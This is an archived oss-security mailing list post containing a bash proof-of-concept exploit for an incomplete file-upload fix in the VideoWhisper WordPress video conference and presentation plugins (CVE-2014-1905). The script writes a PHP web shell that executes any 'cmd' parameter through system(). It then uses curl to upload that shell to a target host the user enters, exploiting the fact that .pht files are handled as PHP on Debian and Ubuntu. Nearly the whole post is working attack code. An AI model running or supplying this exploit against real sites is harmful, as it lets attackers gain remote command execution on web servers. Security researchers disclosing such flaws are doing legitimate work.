Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 18 Apr 2015 06:06:13 -0700
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Exploit for VideoWhisper WP plugins file upload incomplete fix.

#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "				VideoWhisper Remote File Upload PoC Redux $NC";
echo "						4/14/2015";
echo "					   Larry W. Cashdollar, @_larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "		     - Advisories -";
echo "http://www.vapid.dhs.org/blog/04-16-2015/";
echo "http://www.vapid.dhs.org/advisory.php?v=116";
echo "http://www.vapid.dhs.org/advisory.php?v=117";
echo 
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
echo
	curl --form "vw_file=@...le" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php
else
echo "[+] Targeting Video Presentation Plugin";
echo
	curl --form "vw_file=@...le" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
fi;
done

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ